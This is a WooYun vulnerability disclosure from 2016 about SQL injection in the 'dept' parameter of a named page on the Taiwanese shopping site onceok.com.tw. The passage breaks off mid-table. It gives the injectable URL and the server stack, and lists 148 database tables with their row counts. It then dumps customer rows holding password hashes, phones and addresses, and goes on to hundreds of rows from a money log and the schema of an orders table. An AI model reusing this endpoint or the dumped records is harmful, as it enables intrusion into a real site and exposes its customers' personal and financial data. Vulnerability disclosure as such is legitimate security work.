当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177514

漏洞标题:万事OK www主站SQL注入可导致百万信息泄露(用户名/密码/邮箱/电话/订单信息/资金等)(臺灣地區)

相关厂商:ONCEOK

漏洞作者: 暴走

提交时间:2016-02-21 22:54

修复时间:2016-02-26 23:00

公开时间:2016-02-26 23:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-21: 细节已通知厂商并且等待厂商处理中
2016-02-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL Injection Problem.

详细说明:

万事OK生活市集(http://www.onceok.com.tw/)主站首页:

1.png

漏洞证明:

SQL注入地址(注入参数:dept)
http://www.onceok.com.tw/menuitems.php?dept=food&id=

5.png


current-db:onceok,包含148个表,百万级数据

Linux CentOS 4.9
web application technology: Apache 2.0.52, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
Database: onceok
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| tb_ok_search                     | 1360718 |
| pagetrack                        | 372247  |
| tb_ok_order_status_log           | 221458  |
| tb_ok_stock                      | 214566  |
| orders_items                     | 140758  |
| tb_ok_shipment_d                 | 92416   |
| tb_ok_customer_login_log         | 85001   |
| tb_ok_also_purchased_temp_items  | 69125   |
| tb_ok_goods_sales_day            | 53384   |
| view_ok_goods_sales_day          | 53384   |
| tb_ok_also_purchased_match       | 49622   |
| tb_ok_also_purchased_temp_match  | 49622   |
| tb_ok_atm_file_contain           | 45951   |
| tb_ok_http_referer               | 42545   |
| customers                        | 41587   |
| tb_ok_credit_debug_log           | 41415   |
| tb_ok_goods_sales_week           | 40497   |
| view_ok_goods_sales_week         | 40497   |
| orders_info                      | 39810   |
| epaper                           | 37597   |
| tb_ok_goods_log                  | 36855   |
| orders_infobak                   | 32609   |
| view_ok_customer_order           | 28387   |
| tb_ok_debug_logs                 | 28327   |
| tb_ok_shipment_m                 | 27792   |
| view_ok_ship_return              | 27792   |
| view_ok_ship_item_check          | 27357   |
| view_ok_order_item_check         | 27316   |
| tb_ok_goods_sales_month          | 26218   |
| view_ok_goods_sales_month        | 26218   |
| invo_prt                         | 25661   |
| tb_ok_money_log                  | 25092   |
| tb_ok_users_log                  | 24086   |
| tb_ok_customer_order             | 23723   |
| shopping_cart                    | 19203   |
| goods_inventory_log              | 17896   |
| tb_ok_atm_file                   | 17415   |
| tb_ok_http_referer_order         | 17392   |
| view_ok_http_referer_order       | 17392   |
| customers_epaper                 | 16372   |
| customers_fix                    | 15634   |
| tb_ok_also_purchased_order       | 15299   |
| view_ok_money                    | 15190   |
| company_contacts                 | 9772    |
| tb_ok_order_rec                  | 9554    |
| tb_ok_survey                     | 8800    |
| tb_ok_goods_sales_year           | 8053    |
| view_ok_goods_sales_year         | 8053    |
| tb_ok_goods_qa                   | 6855    |
| tb_ok_serial                     | 6381    |
| tb_ok_store_log                  | 6210    |
| tb_ok_order_qa                   | 5704    |
| view_ok_goods_type               | 4307    |
| view_ok_goods_sales_all_info     | 4298    |
| tb_ok_stores_sales_month         | 2835    |
| check_log                        | 2834    |
| tb_ok_goods_sales_all            | 2549    |
| view_ok_goods_sales_all          | 2549    |
| pagetrack_transation             | 2415    |
| view_ok_stores_type              | 2132    |
| orders_full_amount               | 1757    |
| tb_ok_serial_test                | 1329    |
| tb_ok_user_role                  | 562     |
| ip_view_pool                     | 491     |
| tb_ok_idx_temp                   | 480     |
| tb_ok_cat_temp                   | 396     |
| tb_ok_scenic                     | 336     |
| tb_ok_scenic_content             | 335     |
| tb_ok_keyword                    | 291     |
| stores_detail                    | 264     |
| stores_info                      | 263     |
| view_ok_store_sales_info         | 256     |
| tb_ok_users                      | 249     |
| goods_inventory                  | 239     |
| tb_ok_role_ap                    | 194     |
| view_ok_goods_full_amount        | 136     |
| idx_special                      | 108     |
| tb_ok_return_d                   | 95      |
| tb_ok_goods_monthly_sales_list   | 76      |
| view_ok_goods_monthly_sales_list | 76      |
| idx_choice                       | 73      |
| tb_ok_ap                         | 68      |
| invo_range                       | 54      |
| tb_ok_return_m                   | 49      |
| blog_type                        | 42      |
| orders_status                    | 36      |
| goods_type                       | 30      |
| invo_lotto                       | 28      |
| city                             | 26      |
| forums_topic_type                | 26      |
| hot_news                         | 26      |
| tb_ok_goods_weekly_sales_list    | 26      |
| view_ok_goods_weekly_sales_list  | 26      |
| goods_subtype                    | 24      |
| idx_pic_config                   | 23      |
| tb_ok_freight                    | 19      |
| tb_ok_http_referer_setup         | 12      |
| tb_ok_money_type                 | 11      |
| tb_ok_role                       | 11      |
| tb_ok_survey_item                | 11      |
| view_search_keywords_yahoo       | 11      |
| idx_search                       | 8       |
| stores_area                      | 7       |
| tb_ok_return_status              | 6       |
| idx_store                        | 5       |
| tb_ok_banner                     | 5       |
| forums_topic_status              | 4       |
| tb_ok_shipment_status            | 4       |
| customer_facebook                | 3       |
| depts_info                       | 3       |
| stores_special                   | 3       |
| config                           | 1       |
| invo_reprt                       | 1       |
| tb_ok_ship_seq                   | 1       |
+----------------------------------+---------+


找了下和user表相关的:
customers表(包含41587的用户):

Database: onceok
Table: customers
[46 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| position       | varchar(10)         |
| address        | varchar(150)        |
| auth           | varchar(32)         |
| bday           | tinyint(3) unsigned |
| birthday       | varchar(10)         |
| blog           | varchar(200)        |
| bmonth         | tinyint(3) unsigned |
| byear          | int(10) unsigned    |
| career         | varchar(5)          |
| cdate          | datetime            |
| city           | varchar(10)         |
| CREATE_DATE    | datetime            |
| CREATE_USER    | varchar(100)        |
| credit_card    | varchar(1)          |
| DATESTAMP      | datetime            |
| description    | varchar(100)        |
| district       | varchar(10)         |
| education      | varchar(1)          |
| email          | varchar(100)        |
| email_epaper   | varchar(1)          |
| email_premium  | varchar(1)          |
| facebook       | varchar(50)         |
| fax_01         | varchar(16)         |
| fax_02         | varchar(16)         |
| fburl          | varchar(200)        |
| free_sepecial  | tinyint(4)          |
| gender         | varchar(1)          |
| google         | varchar(100)        |
| id             | varchar(100)        |
| identification | varchar(10)         |
| income         | varchar(10)         |
| info           | varchar(50)         |
| ldate          | datetime            |
| mobile         | varchar(10)         |
| name           | varchar(20)         |
| ok_money_total | int(11)             |
| ok_ranking     | int(11)             |
| password       | varchar(60)         |
| status         | varchar(1)          |
| tel_day        | varchar(30)         |
| tel_night      | varchar(16)         |
| uid            | int(11) unsigned    |
| user_id        | varchar(100)        |
| USERSTAMP      | varchar(100)        |
| yahoo          | varchar(100)        |
| zip            | varchar(5)          |
+----------------+---------------------+


还是老样子,跑几条数据示意下,由于字段多,就跑了个4个用户信息(包含useid、邮箱、电话、密码等信息)

web server operating system: Linux CentOS 4.9
web application technology: Apache 2.0.52, PHP 5.1.6
back-end DBMS: MySQL 5
Database: onceok
Table: customers
[4 entries]
+----------------------------------------------+-------+----------------------------------------------+----------------+---------+----------+------+------+----------------------------------+----------+------+---------------------+-------+----------------------------------------------+-------+---------------------+-------+--------+--------+--------+--------+--------+--------+--------+--------+------------+---------+--------------------+----------+----------+----------+-------------------------------------+----------------------------------------------+-----------+-----------+---------------------+------------+------------+---------------------+----------------------------------------------+-------------+-------------+--------------+---------------+---------------+----------------+
| id                                           | uid   | user_id                                      | identification | zip     | city     | blog | bday | auth                             | name     | info | ldate               | fburl | email                                        | yahoo | cdate               | byear | google | bmonth | fax_01 | income | status | fax_02 | career | gender | mobile     | tel_day | address            | district | birthday | facebook | password                            | USERSTAMP                                    | tel_night | education | DATESTAMP           | position   | ok_ranking | CREATE_DATE         | CREATE_USER                                  | description | credit_card | email_epaper | email_premium | free_sepecial | ok_money_total |
+----------------------------------------------+-------+----------------------------------------------+----------------+---------+----------+------+------+----------------------------------+----------+------+---------------------+-------+----------------------------------------------+-------+---------------------+-------+--------+--------+--------+--------+--------+--------+--------+--------+------------+---------+--------------------+----------+----------+----------+-------------------------------------+----------------------------------------------+-----------+-----------+---------------------+------------+------------+---------------------+----------------------------------------------+-------------+-------------+--------------+---------------+---------------+----------------+
| \nset|set&set\n                              | 39753 | \nset|set&set\n                              | NULL           | <blank> | <blank>  | NULL | 2    | 3843048c065168e11477dac06b6f4d38 | lxjrxsph | NULL | 2015-03-20 05:28:53 | NULL  | \nset|set&set\n                              | NULL  | 0000-00-00 00:00:00 | 2010  | NULL   | 1      | NULL   | NULL   | N      | NULL   | NULL   | M      | 987-65-432 | <blank> | 3137 Laguna Street | <blank>  | <blank>  | NULL     | 139f63cbecd687fb25de9a36b30e15f7:bb | \nset|set&set\n                              | <blank>   | NULL      | 2015-03-20 05:28:53 | NULL       | 0          | 2015-03-20 05:28:53 | \nset|set&set\n                              | NULL        | NULL        | 0            | 1             | 0             | 0              |
| \nSomeCustomInjectedHeader:injected_by_wvs   | 33696 | \nSomeCustomInjectedHeader:injected_by_wvs   | NULL           | 51800   | shenzhen | NULL | 0    | 3843048c065168e11477dac06b6f4d38 | 88888    | NULL | 2012-12-03 13:02:15 | NULL  | \nSomeCustomInjectedHeader:injected_by_wvs   | NULL  | 0000-00-00 00:00:00 | 0     | NULL   | 0      | NULL   | NULL   | N      | NULL   | NULL   | M      | 1388888888 | 01      | <blank>            | 88888    | 01       | NULL     | fd97ce997d1e40bb34acfbd2ae53eaea:c7 | \nSomeCustomInjectedHeader:injected_by_wvs   | <blank>   | NULL      | 2012-12-03 13:02:15 | NULL       | 0          | 2012-12-03 13:02:15 | \nSomeCustomInjectedHeader:injected_by_wvs   | NULL        | NULL        | 0            | 1             | 0             | 0              |
| \r\nSomeCustomInjectedHeader:injected_by_wvs | 33695 | \r\nSomeCustomInjectedHeader:injected_by_wvs | NULL           | 51800   | shenzhen | NULL | 0    | 3843048c065168e11477dac06b6f4d38 | 88888    | NULL | 2012-12-03 13:02:14 | NULL  | \r\nSomeCustomInjectedHeader:injected_by_wvs | NULL  | 0000-00-00 00:00:00 | 0     | NULL   | 0      | NULL   | NULL   | N      | NULL   | NULL   | M      | 1388888888 | 01      | <blank>            | 88888    | 01       | NULL     | 062b9f6d8642c88cb14ee16e38c139d1:6d | \r\nSomeCustomInjectedHeader:injected_by_wvs | <blank>   | NULL      | 2012-12-03 13:02:14 | NULL       | 0          | 2012-12-03 13:02:14 | \r\nSomeCustomInjectedHeader:injected_by_wvs | NULL        | NULL        | 0            | 1             | 0             | 0              |
| \rSomeCustomInjectedHeader:injected_by_wvs   | 39712 | NULL           | <blank>  | NULL | 1    | 3843048c065168e11477dac06b6f4d38 | ssxxpacn | NULL | 2015-03-20 05:06:24 | NULL  | \rSomeCustomInjectedHeader:injected_by_wvs   | 0000-00-00 00:00:00 | 2010  | NULL   | 2      | NULL   | NULL   | N      | NULL   | NULL   | M      | 987-65-432 | <blank> | 3137 Laguna Street | <blank>  | <blank>  | NULL     | 78050c84fa1c11f8290ef2949ca86f9d:99 | \rSomeCustomInjectedHeader:injected_by_wvs   | <blank>   | NULL      | 2015-03-20 05:06:24 | NULL       | 0          | 2015-03-20 05:06:24 | \rSomeCustomInjectedHeader:injected_by_wvs   | NULL        | NULL        | 0            | 1             | 0             | 0              |
+----------------------------------------------+-------+----------------------------------------------+----------------+---------+----------+------+------+----------------------------------+----------+------+---------------------+-------+----------------------------------------------+-------+---------------------+-------+--------+--------+--------+--------+--------+--------+--------+--------+------------+---------+--------------------+----------+----------+----------+-------------------------------------+----------------------------------------------+-----------+-----------+---------------------+------------+------------+---------------------+----------------------------------------------+-------------+-------------+--------------+---------------+---------------+----------------+


在看下tb_ok_money_log表(因为有money...,应该是消费的钱数吧.)

Database: onceok
Table: tb_ok_money_log
[7 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| content     | varchar(50)      |
| create_date | datetime         |
| create_user | varchar(50)      |
| id          | int(10) unsigned |
| ok_money    | int(11)          |
| otype       | char(3)          |
| uid         | int(11)          |
+-------------+------------------+


几十万数据,那就继续看几条:

Database: onceok
Table: tb_ok_money_log
[25092 entries]
+-------+-------+-------+--------------------------------------------+----------+---------------------+-----------------------------------------+
| id    | uid   | otype | content                                    | ok_money | create_date         | create_user                             |
+-------+-------+-------+--------------------------------------------+----------+---------------------+-----------------------------------------+
| 1     | 4938  | B01   | GL12100042                                 | 1400     | 2006-12-18 16:08:09 | 80117761                                |
| 2     | 3518  | B01   | GL12100053                                 | 450      | 2006-12-20 12:23:09 | 29420797                                |
| 3     | 4938  | B01   | GL1310001B                                 | 440      | 2006-12-22 16:09:50 | 27493127                                |
| 4     | 4938  | B01   | HA0810001B                                 | 2000     | 2007-01-09 11:23:26 | 09000602                                |
| 5     | 7537  | B01   | HA0810002A                                 | 9430     | 2007-01-17 11:17:51 | 27488503                                |
| 6     | 9396  | B01   | HA1710001A                                 | 1150     | 2007-01-23 11:22:22 | 29420797                                |
| 7     | 9575  | B01   | HA17100032                                 | 590      | 2007-01-18 15:25:06 | 27493127                                |
| 8     | 7987  | B01   | HA1810001A                                 | 1040     | 2007-01-19 09:58:17 | 27493127                                |
| 9     | 10381 | B01   | HA1910001A                                 | 700      | 2007-01-22 15:54:43 | 49997880                                |
| 10    | 4938  | B01   | HA22100022                                 | 1290     | 2007-01-23 16:57:36 | 73858108                                |
| 11    | 4938  | B01   | HA22100044                                 | 900      | 2007-01-22 19:54:45 | 49997880                                |
| 12    | 10886 | B01   | HA25100011                                 | 360      | 2007-01-26 17:19:03 | 12926907                                |
| 13    | 4478  | B01   | HA28100011                                 | 290      | 2007-01-29 18:47:04 | 27493127                                |
| 14    | 3677  | B01   | HA30100012                                 | 800      | 2007-02-01 17:43:24 | 80117761                                |
| 15    | 3928  | B01   | HA31100023                                 | 1050     | 2007-02-01 11:18:16 | 33193302                                |
| 16    | 7215  | B01   | HB0110001B                                 | 610      | 2007-02-05 11:49:02 | 09544200                                |
| 17    | 1755  | B01   | HB0310001B                                 | 2635     | 2007-02-07 10:17:37 | 60596406                                |
| 18    | 4938  | B01   | HB0510001B                                 | 1880     | 2007-02-06 15:11:41 | 09544200                                |
| 19    | 4938  | B01   | HB07100031                                 | 4200     | 2007-02-09 19:03:54 | 49997880                                |
| 20    | 4463  | B01   | HB0810001B                                 | 4005     | 2007-02-09 13:09:31 | 09544200                                |
| 21    | 8177  | B01   | HB0810002A                                 | 580      | 2007-02-09 13:12:09 | 09544200                                |
| 22    | 11404 | B01   | HB0910001B                                 | 1240     | 2007-02-10 10:48:40 | 09544200                                |
| 23    | 12055 | B01   | HB10100021                                 | 540      | 2007-02-13 14:44:14 | 09544200                                |
| 24    | 12055 | B01   | HB1110001A                                 | 630      | 2007-02-13 14:47:07 | 09544200                                |
| 25    | 8268  | B01   | HB11100021                                 | 530      | 2007-02-15 17:42:14 | 05157634                                |
| 26    | 1806  | B01   | HB12100021                                 | 500      | 2007-02-13 13:28:11 | 14251490                                |
| 27    | 12200 | B01   | HB12100032                                 | 1550     | 2007-02-13 17:59:02 | 19243745                                |
| 28    | 1329  | B01   | HB12100043                                 | 640      | 2007-02-13 14:46:14 | 09544200                                |
| 29    | 7537  | B01   | HB12100054                                 | 7040     | 2007-02-15 15:38:08 | 15692473                                |
| 30    | 8306  | B01   | HB12100065                                 | 440      | 2007-02-13 14:46:33 | 09544200                                |
| 31    | 7537  | B01   | HB12100076                                 | 3300     | 2007-02-15 15:38:59 | 15692473                                |
| 32    | 5009  | B01   | HB12100087                                 | 455      | 2007-02-13 14:44:42 | 09544200                                |
| 33    | 11610 | B01   | HB1310001A                                 | 490      | 2007-02-13 15:32:10 | 73858108                                |
| 34    | 3573  | B01   | HB13100021                                 | 1310     | 2007-02-14 11:00:17 | 80117761                                |
| 35    | 4657  | B01   | HB13100032                                 | 1120     | 2007-02-14 19:19:26 | 27697608                                |
| 36    | 11236 | B01   | HB13100043                                 | 1040     | 2007-02-14 19:20:13 | 27697608                                |
| 37    | 7210  | B01   | HB1410001A                                 | 620      | 2007-02-15 17:42:46 | 05157634                                |
| 38    | 241   | B01   | HB1510001A                                 | 7050     | 2007-02-16 14:38:13 | 73858108                                |
| 39    | 6451  | B01   | HB15100032                                 | 1040     | 2007-02-15 16:43:47 | 09544200                                |
| 40    | 513   | B01   | HB15100043                                 | 1140     | 2007-02-15 16:43:29 | 09544200                                |
| 41    | 5035  | B01   | HB21100011                                 | 420      | 2007-04-12 08:31:30 | admin                                   |
| 42    | 12459 | B01   | HB28100011                                 | 2140     | 2007-04-12 08:32:20 | admin                                   |
| 43    | 11703 | B01   | HC0110001B                                 | 550      | 2007-04-12 08:32:02 | admin                                   |
| 44    | 8893  | B01   | HC0210001B                                 | 870      | 2007-04-12 08:32:32 | admin                                   |
| 45    | 12914 | B01   | HC0210002A                                 | 440      | 2007-04-12 08:32:45 | admin                                   |
| 46    | 9955  | B01   | HC0410001B                                 | 355      | 2007-04-12 08:32:58 | admin                                   |
| 47    | 12594 | B01   | HC0510001B                                 | 310      | 2007-04-12 08:33:23 | admin                                   |
| 48    | 8468  | B01   | HC0510002A                                 | 750      | 2007-04-12 08:33:12 | admin                                   |
| 49    | 7924  | B01   | HC0610001B                                 | 1250     | 2007-04-12 08:33:37 | admin                                   |
| 50    | 1459  | B01   | HC0610002A                                 | 660      | 2007-04-12 08:33:50 | admin                                   |
| 51    | 4938  | B01   | HC06100042                                 | 490      | 2007-04-12 08:34:12 | admin                                   |
| 52    | 8893  | B01   | HC06100053                                 | 5310     | 2007-04-12 08:34:26 | admin                                   |
| 53    | 4938  | B01   | HC07100031                                 | 3400     | 2007-04-12 08:34:40 | admin                                   |
| 54    | 6362  | B01   | HC07100042                                 | 1350     | 2007-04-12 08:34:56 | admin                                   |
| 55    | 1719  | B01   | HC0810001B                                 | 1650     | 2007-05-15 18:56:11 | admin                                   |
| 56    | 9768  | B01   | HC0810002A                                 | 1160     | 2007-04-12 08:35:23 | admin                                   |
| 57    | 1222  | B01   | HC0910001B                                 | 500      | 2007-04-12 08:36:42 | admin                                   |
| 58    | 3929  | B01   | HC10100021                                 | 1050     | 2007-04-12 08:37:03 | admin                                   |
| 59    | 11580 | B01   | HC1110001A                                 | 3355     | 2007-04-12 08:56:10 | admin                                   |
| 60    | 5110  | B01   | HC1210001A                                 | 1050     | 2007-04-12 08:54:48 | admin                                   |
| 61    | 9955  | B01   | HC12100021                                 | 1310     | 2007-04-12 08:53:42 | admin                                   |
| 62    | 4938  | B01   | HC1310001A                                 | 1500     | 2007-04-12 08:55:22 | admin                                   |
| 63    | 566   | B01   | HC13100032                                 | 1100     | 2007-04-12 08:55:45 | admin                                   |
| 64    | 4583  | B01   | HC13100043                                 | 2540     | 2007-04-12 08:58:01 | admin                                   |
| 65    | 4323  | B01   | HC14100021                                 | 1050     | 2007-04-12 08:58:25 | admin                                   |
| 66    | 7284  | B01   | HC1510001A                                 | 730      | 2007-04-12 08:58:49 | admin                                   |
| 67    | 10362 | B01   | HC15100032                                 | 1000     | 2007-04-12 08:59:08 | admin                                   |
| 68    | 4938  | B01   | HC1610001A                                 | 1045     | 2007-04-12 08:59:25 | admin                                   |
| 69    | 4938  | B01   | HC16100021                                 | 18700    | 2007-04-12 09:07:02 | admin                                   |
| 70    | 13027 | B01   | HC1710001A                                 | 1555     | 2007-04-12 08:59:55 | admin                                   |
| 71    | 2769  | B01   | HC1810001A                                 | 850      | 2007-04-12 08:59:42 | admin                                   |
| 72    | 8972  | B01   | HC18100021                                 | 890      | 2007-04-12 11:46:40 | admin                                   |
| 73    | 7244  | B01   | HC19100032                                 | 1350     | 2007-04-12 09:00:11 | admin                                   |
| 74    | 8706  | B01   | HC20100011                                 | 1670     | 2007-04-12 11:40:29 | admin                                   |
| 75    | 4936  | B01   | HC20100033                                 | 2800     | 2007-04-12 11:47:58 | admin                                   |
| 76    | 5463  | B01   | HC20100044                                 | 1200     | 2007-04-12 09:07:14 | admin                                   |
| 77    | 7537  | B01   | HC21100011                                 | 10150    | 2007-04-12 11:39:36 | admin                                   |
| 78    | 2625  | B01   | HC23100022                                 | 845      | 2007-04-12 11:47:01 | admin                                   |
| 79    | 8877  | B01   | HC23100033                                 | 400      | 2007-04-12 11:47:34 | admin                                   |
| 80    | 8229  | B01   | HC24100011                                 | 2500     | 2007-04-12 11:48:16 | admin                                   |
| 81    | 11279 | B01   | HC26100022                                 | 2500     | 2007-04-12 11:48:36 | admin                                   |
| 82    | 11481 | B01   | HC27100022                                 | 2501     | 2007-04-12 11:49:03 | admin                                   |
| 83    | 7537  | B01   | HC27100033                                 | 3400     | 2007-04-12 11:51:03 | admin                                   |
| 84    | 7537  | B01   | HC27100044                                 | 500      | 2007-04-12 11:50:39 | admin                                   |
| 85    | 253   | B01   | HC28100022                                 | 2545     | 2007-04-12 11:49:33 | admin                                   |
| 86    | 6076  | B01   | HC28100033                                 | 550      | 2007-04-12 11:49:58 | admin                                   |
| 87    | 10380 | B01   | HC28100044                                 | 2360     | 2007-04-12 11:50:17 | admin                                   |
| 88    | 8254  | B01   | HC29100011                                 | 460      | 2007-04-12 11:51:18 | admin                                   |
| 89    | 7537  | B01   | HC29100022                                 | 4345     | 2007-04-12 11:51:37 | admin                                   |
| 90    | 3518  | B01   | HC29100033                                 | 4440     | 2007-04-12 11:52:10 | admin                                   |
| 91    | 3518  | B01   | HC29100044                                 | 590      | 2007-04-12 11:52:28 | admin                                   |
| 92    | 8481  | B01   | HC29100055                                 | 895      | 2007-04-12 20:12:25 | admin                                   |
| 93    | 8481  | B01   | HC29100066                                 | 1010     | 2007-04-12 13:24:15 | admin                                   |
| 94    | 1378  | B01   | HC29100077                                 | 1300     | 2007-04-12 13:24:31 | admin                                   |
| 95    | 2780  | B01   | HC30100023                                 | 2255     | 2007-04-12 13:25:11 | admin                                   |
| 96    | 7414  | B01   | HC31100012                                 | 1000     | 2007-04-12 13:25:41 | admin                                   |
| 97    | 3687  | B01   | HD0110001B                                 | 6165     | 2007-04-12 13:25:54 | admin                                   |
| 98    | 792   | B01   | HD01100031                                 | 2500     | 2007-04-12 13:27:39 | admin                                   |
| 99    | 4807  | B01   | HD0210002A                                 | 1285     | 2007-04-12 13:26:08 | admin                                   |
| 100   | 7537  | B01   | HD02100031                                 | 2575     | 2007-04-12 13:27:56 | admin                                   |
| 101   | 4807  | B01   | HD02100042                                 | 1245     | 2007-04-12 13:26:25 | admin                                   |
| 102   | 11726 | B01   | HD02100053                                 | 2500     | 2007-04-12 13:26:39 | admin                                   |
| 103   | 7537  | B01   | HD02100064                                 | 2530     | 2007-04-12 13:28:13 | admin                                   |
| 104   | 7537  | B01   | HD03100031                                 | 8670     | 2007-04-12 13:29:44 | admin                                   |
| 105   | 5028  | B01   | HD03100042                                 | 1200     | 2007-04-12 13:28:34 | admin                                   |
| 106   | 5028  | B01   | HD03100053                                 | 1080     | 2007-04-12 13:29:31 | admin                                   |
| 107   | 12080 | B01   | HD0410001B                                 | 3300     | 2007-04-12 13:30:00 | admin                                   |
| 108   | 9978  | B01   | HD0510002A                                 | 1270     | 2007-04-12 13:30:18 | admin                                   |
| 109   | 5443  | B01   | HD0610002A                                 | 700      | 2007-04-18 15:31:01 | admin                                   |
| 110   | 10999 | B01   | HD0710001B                                 | 300      | 2007-04-12 13:33:08 | admin                                   |
| 111   | 6361  | B01   | HD0910001B                                 | 930      | 2007-04-18 15:42:46 | admin                                   |
| 112   | 7390  | B01   | HD0910002A                                 | 1425     | 2007-04-12 13:36:18 | admin                                   |
| 113   | 6902  | B01   | HD09100031                                 | 510      | 2007-04-18 15:28:16 | admin                                   |
| 114   | 4657  | B01   | HD09100042                                 | 800      | 2007-04-18 15:40:18 | admin                                   |
| 115   | 4966  | B01   | HD09100053                                 | 930      | 2007-04-18 15:33:56 | admin                                   |
| 116   | 11279 | B01   | HD1010001A                                 | 1390     | 2007-04-18 15:38:41 | admin                                   |
| 117   | 5153  | B01   | HD10100032                                 | 2835     | 2007-04-18 15:47:04 | admin                                   |
| 118   | 8893  | B01   | HD10100043                                 | 1210     | 2007-05-03 16:40:02 | sa11                                    |
| 119   | 8755  | B01   | HD1110001A                                 | 1340     | 2007-04-18 15:50:40 | admin                                   |
| 120   | 12674 | B01   | HD12100021                                 | 1320     | 2007-04-18 15:53:32 | admin                                   |
| 121   | 2519  | B01   | HD12100032                                 | 570      | 2007-04-18 16:13:14 | admin                                   |
| 122   | 6013  | B01   | HD12100043                                 | 960      | 2007-04-18 16:06:19 | admin                                   |
| 123   | 12907 | B01   | HD12100054                                 | 380      | 2007-04-18 16:16:52 | admin                                   |
| 124   | 11690 | B01   | HD1310001A                                 | 1760     | 2007-04-18 16:09:28 | admin                                   |
| 125   | 10533 | B01   | HD14100021                                 | 2020     | 2007-04-18 16:19:43 | admin                                   |
| 126   | 5395  | B01   | HD15100032                                 | 860      
...
| 24735 | 14838 | R01   | ?? [email protected]                     | 100      | 2009-05-22 23:45:50 | [email protected]                     |
| 24736 | 14839 | R01   | ?? [email protected]                | 100      | 2009-04-10 01:03:59 | [email protected]                |
| 24737 | 14840 | R01   | ?? [email protected]                 | 100      | 2009-05-23 20:10:56 | [email protected]                 |
| 24738 | 14841 | R01   | ?? [email protected]                     | 100      | 2009-05-15 11:35:05 | [email protected]                     |
| 24739 | 14842 | R01   | ?? [email protected]                     | 100      | 2009-05-24 18:13:30 | [email protected]                     |
| 24740 | 14843 | R01   | ?? [email protected]                 | 100      | 2009-05-30 12:50:40 | [email protected]                 |
| 24741 | 14844 | R01   | ?? [email protected]                 | 100      | 2009-05-24 22:47:57 | [email protected]                 |
| 24742 | 14845 | R01   | ?? [email protected]                   | 100      | 2009-05-23 15:57:24 | [email protected]                   |
| 24743 | 14846 | R01   | ?? [email protected]              | 100      | 2009-05-24 18:16:50 | [email protected]              |
| 24744 | 14847 | R01   | ?? [email protected]                     | 100      | 2009-05-22 15:39:47 | [email protected]                     |
| 24745 | 14848 | R01   | ?? [email protected]                  | 100      | 2009-05-10 22:17:37 | [email protected]                  |
| 24746 | 14849 | R01   | ?? [email protected]                   | 100      | 2009-05-05 22:25:09 | [email protected]                   |
| 24747 | 14850 | R01   | ?? [email protected]                    | 100      | 2009-05-24 19:49:29 | [email protected]                    |
| 24748 | 14851 | R01   | ?? [email protected]                     | 100      | 2009-05-22 19:30:38 | [email protected]                     |
| 24749 | 14852 | R01   | ?? [email protected]                  | 100      | 2009-05-04 18:29:14 | [email protected]                  |
| 24750 | 14853 | R01   | ?? [email protected]                   | 100      | 2009-05-24 06:51:33 | [email protected]                   |
| 24751 | 14854 | R01   | ?? [email protected]                 | 100      | 2009-05-04 17:59:34 | [email protected]                 |
| 24752 | 14855 | R01   | ?? [email protected]                  | 100      | 2009-05-09 16:45:06 | [email protected]                  |
| 24753 | 14856 | R01   | ?? [email protected]                      | 100      | 2009-05-19 08:44:33 | [email protected]                      |
| 24754 | 14857 | R01   | ?? [email protected]                     | 100      | 2009-05-11 10:53:27 | [email protected]                     |
| 24755 | 14858 | R01   | ?? [email protected]                | 100      | 2009-04-28 20:19:26 | [email protected]                |
| 24756 | 14859 | R01   | ?? [email protected]                   | 100      | 2009-05-21 17:21:55 | [email protected]                   |
| 24757 | 14860 | R01   | ?? [email protected]            | 100      | 2009-05-10 22:12:41 | [email protected]            |
| 24758 | 14861 | R01   | ?? [email protected]                   | 100      | 2009-04-11 23:48:28 | [email protected]                   |
| 24759 | 14862 | R01   | ?? [email protected]                    | 100      | 2009-05-26 17:24:05 | [email protected]                    |
| 24760 | 14863 | R01   | ?? [email protected]                     | 100      | 2009-05-10 09:37:44 | [email protected]                     |
| 24761 | 14864 | R01   | ?? [email protected]                     | 100      | 2009-04-14 23:15:40 | [email protected]                     |
| 24762 | 14865 | R01   | ?? [email protected]                | 100      | 2009-04-18 22:34:28 | [email protected]                |
| 24763 | 14866 | R01   | ?? [email protected]                  | 100      | 2009-05-05 15:27:24 | [email protected]                  |
| 24764 | 14867 | R01   | ?? [email protected]                      | 100      | 2009-05-10 20:51:32 | [email protected]                      |
| 24765 | 14868 | R01   | ?? [email protected]                 | 100      | 2009-05-08 13:43:15 | [email protected]                 |
| 24766 | 14869 | R01   | ?? [email protected]                       | 100      | 2009-05-03 18:11:24 | [email protected]                       |
| 24767 | 14870 | R01   | ?? [email protected]          | 100      | 2009-05-22 15:56:11 | [email protected]          |
| 24768 | 14871 | R01   | ?? [email protected]           | 100      | 2009-05-10 12:30:42 | [email protected]           |
| 24769 | 14872 | R01   | ?? [email protected]                    | 100      | 2009-05-12 20:32:17 | [email protected]                    |
| 24770 | 14873 | R01   | ?? [email protected]                   | 100


还有订单信息表orders_info(几十万订单信息,包含各种信息...应有尽有)

Database: onceok
Table: orders_info
[45 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| AMT               | int(6)           |
| authcode          | varchar(10)      |
| CANCEL_DATE       | date             |
| CANCEL_USER       | varchar(20)      |
| cdate             | datetime         |
| CREATE_DATE       | datetime         |
| CREATE_USER       | varchar(50)      |
| customer_id       | varchar(50)      |
| DATESTAMP         | datetime         |
| description       | varchar(200)     |
| discount          | int(11)          |
| err_msg           | varchar(100)     |
| extra_product     | varchar(500)     |
| free_full_amount  | tinyint(4)       |
| free_special      | tinyint(4)       |
| id                | varchar(10)      |
| INV_DATE          | date             |
| INV_DONATE        | tinyint(1)       |
| INV_NO            | varchar(10)      |
| INV_SDATE         | date             |
| INV_TITLE         | varchar(50)      |
| INV_TYPE          | varchar(1)       |
| ip_address        | varchar(15)      |
| memo              | varchar(500)     |
| NON_TAX_AMT       | int(6)           |
| ok_money_order    | int(11)          |
